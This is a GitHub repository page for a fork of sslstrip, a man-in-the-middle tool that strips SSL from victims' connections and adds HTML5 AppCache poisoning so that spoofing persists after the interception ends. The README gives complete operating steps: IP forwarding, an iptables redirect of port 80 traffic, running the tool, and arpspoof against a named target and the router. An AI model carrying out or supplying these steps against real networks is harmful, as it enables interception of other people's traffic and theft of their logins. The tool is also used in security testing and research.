Skip to content
This repository

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

A tool for exploiting Moxie Marlinspike's SSL "stripping" attack.

branch: master

This branch is 0 commits ahead and 0 commits behind master

Fetching latest commit…

Octocat-spinner-32-eaf2f5

Cannot retrieve the latest commit at this time

Octocat-spinner-32 app_cache_poison
Octocat-spinner-32 sslstrip
Octocat-spinner-32 COPYING
Octocat-spinner-32 README
Octocat-spinner-32 lock.ico
Octocat-spinner-32 setup.py
Octocat-spinner-32 sslstrip.py
Octocat-spinner-32 testmitm.sh
README
sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 
attacks.

This fork can also perform response tampering attacks. 

One prepared example of tampering attack is HTML5 AppCache poisoning attack that places the 
modified responses in browsers long-lasting HTML5 AppCache so that the spoofing continues
even after the victim is no longer MITMed. This functionality has been added by Krzysztof Kotowicz
<kkotowicz at gmail dot com>

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing:
	* Unpack: tar zxvf sslstrip-0.5.tar.gz
	* Install twisted:  sudo apt-get install python-twisted-web
	* (Optionally) run 'python setup.py install' as root to install, 
	  or you can just run it out of the directory.  

Running:
	sslstrip can be run from the source base without installation.  
	Just run 'python sslstrip.py -h' as a non-root user to get the 
	command-line options.

	The four steps to getting this working (assuming you're running Linux) 
	are:

	1) Flip your machine into forwarding mode (as root):
	   echo "1" > /proc/sys/net/ipv4/ip_forward

	2) Setup iptables to intercept HTTP requests (as root):
	   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
	
	3) Run sslstrip with the command-line options you'd like (see above).

	4) Run arpspoof to redirect traffic to your machine (as root):
	   arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

More Info:
	http://www.thoughtcrime.org/software/sslstrip/
	http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
Something went wrong with that request. Please try again.